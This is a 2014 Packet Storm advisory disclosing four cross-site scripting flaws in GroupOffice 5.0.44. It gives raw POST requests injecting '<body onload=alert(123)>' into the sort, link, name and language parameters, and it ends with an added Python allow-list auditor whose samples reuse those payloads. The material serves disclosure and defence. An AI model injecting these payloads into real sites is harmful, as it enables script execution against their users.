GroupOffice 5.0.44 Cross Site Scripting

2014-02-27T00:00:00
ID PACKETSTORM:125449
Type packetstorm
Reporter HauntIT
Modified 2014-02-27T00:00:00

Description

                                        
# ==============================================================  
# Title ...| GroupOffice Multiple XSS  
# Version .| groupoffice-com-5.0.44.tar.gz   
# Date ....| 27.02.2014  
# Found ...| HauntIT Blog  
# Home ....| https://www.group-office.com/  
# ==============================================================  
  
  
# ==============================================================  
# 1. XSS  
  
  
---<request>---  
POST /k/cms/groupoffice/groupoffice-com-5.0.44/index.php?r=tasks/portlet/portletGrid&security_token=PRWJsDvCpVw4kElX2zBN HTTP/1.1  
Host: 10.149.14.62  
(...)  
Cache-Control: no-cache  
  
sort='><body onload=alert(123)>&dir=ASC&groupBy=tasklist_name&groupDir=ASC&security_token=PRWJsDvCpVw4kElX2zBN  
---<request>---  
  
  
  
# ==============================================================  
# 2. XSS  
  
---<request>---  
POST /k/cms/groupoffice/groupoffice-com-5.0.44/index.php?r=tasks/task/submit&security_token=PRWJsDvCpVw4kElX2zBN HTTP/1.1  
Host: 10.149.14.62  
(...)  
Cache-Control: no-cache  
  
task=task&tmp_files=&id=0&security_token=PRWJsDvCpVw4kElX2zBN&name=asdasd&link=<body onload=alert(123)>&start_time=27-02-2014&due_time=27-02-2014&status=NEEDS-ACTION&percentage_complete=0&tasklist_id=3&category_id=&priority=1&description=&interval=1&freq=&col_9=  
---<request>---  
  
  
  
# ==============================================================  
# 3. XSS  
  
---<request>---  
POST /k/cms/groupoffice/groupoffice-com-5.0.44/index.php?r=files/folder/submit&security_token=PRWJsDvCpVw4kElX2zBN HTTP/1.1  
Host: 10.149.14.62  
(...)  
Cache-Control: no-cache  
  
parent_id=36&security_token=PRWJsDvCpVw4kElX2zBN&name=<body onload=alert(123)>  
---<request>---  
  
  
  
  
# ==============================================================  
# 4. XSS  
  
---<request>---  
POST /k/cms/groupoffice/groupoffice-com-5.0.44/index.php?r=settings/submit&security_token=PRWJsDvCpVw4kElX2zBN HTTP/1.1  
Host: 10.149.14.62  
(...)  
Cache-Control: no-cache  
  
tmp_files=&id=3&security_token=PRWJsDvCpVw4kElX2zBN&language=<body onload=alert(123)>&timezone=Asia%2FJakarta&dateformat=-%3AdmY&time_format=H%3Ai&first_weekday=1&holidayset=en&thousands_separator=%2C&decimal_separator=.&currency=%E2%82%AC&list_separator=%3B&text_separator=%22&theme=Group-Office&start_module=summary&max_rows_list=30&sort_name=last_name&mute_sound=0&mute_reminder_sound=0&mute_new_mail_sound=0&popup_reminders=0&mail_reminders=0&show_smilies=1&auto_punctuation=0&current_password=&password=&passwordConfirm=&first_name=Demo&middle_name=&last_name=User&title=&suffix=&initials=&sex=M&birthday=&department=&function=CEO&email=demo%40acmerpp.demo&email2=&email3=&home_phone=&fax=&cellular=06-12345678&work_phone=&work_fax=&address=1111%20Broadway&address_no=&zip=10019&city=New%20York&state=NY&country=US&use_html_markup=on&font_size=12px&comments_enable_read_more=0&reminder_value=&reminder_multiplier=60&background=EBF1E2&default_calendar_id=3&show_statuses=1&default_tasklist_id=3  
---<request>---  
  
  
  
# ==============================================================  
# More @ http://HauntIT.blogspot.com  
# Thanks! ;)  
# o/   
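Added example, not part of the original advisory or of GroupOffice: a small request auditor that checks the four route/parameter pairs listed above (sort, link, name, language) against allow-list patterns and reports values that fail. The patterns, the sample requests, the host and the token placeholder are assumptions made for illustration.

```python
import re
from urllib.parse import parse_qs, parse_qsl, urlsplit

# Route -> (parameter, allow-list pattern). Routes and parameter names come from
# the advisory; the patterns are assumptions about what legitimate values look like.
RULES = {
    "tasks/portlet/portletGrid": ("sort", re.compile(r"[A-Za-z_][A-Za-z0-9_]*")),
    "tasks/task/submit": ("link", re.compile(r"[^<>\"'&]*")),
    "files/folder/submit": ("name", re.compile(r"[^<>\"'&]+")),
    "settings/submit": ("language", re.compile(r"[a-z]{2}(_[a-z]{2})?")),
}

def audit_request(raw):
    """Return (route, parameter, decoded value) for each rule the request breaks."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    parts = head.split("\n", 1)[0].split(" ")
    if len(parts) != 3 or parts[0] != "POST":
        return []
    route = parse_qs(urlsplit(parts[1]).query).get("r", [""])[0]
    if route not in RULES:
        return []
    param, pattern = RULES[route]
    # parse_qsl percent-decodes, so encoded markup is checked in its decoded form.
    return [(route, key, value)
            for key, value in parse_qsl(body.strip(), keep_blank_values=True)
            if key == param and not pattern.fullmatch(value)]

# Constructed sample requests (host and token are placeholders).
GRID = "POST /index.php?r=tasks/portlet/portletGrid&security_token=TOKEN HTTP/1.1\r\nHost: app.example\r\n\r\n"
SETTINGS = "POST /index.php?r=settings/submit&security_token=TOKEN HTTP/1.1\r\nHost: app.example\r\n\r\n"
SAMPLES = [
    GRID + "sort='><body onload=alert(123)>&dir=ASC&groupBy=tasklist_name",
    GRID + "sort=due_time&dir=ASC&groupBy=tasklist_name",
    SETTINGS + "id=3&language=%3Cbody%20onload%3Dalert(123)%3E&timezone=Asia%2FJakarta",
    SETTINGS + "id=3&language=en&timezone=Asia%2FJakarta",
]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(audit_request(sample) or "ok")
```

Input validation of this kind narrows what reaches the application; the values still need HTML-encoding wherever they are written back into a page.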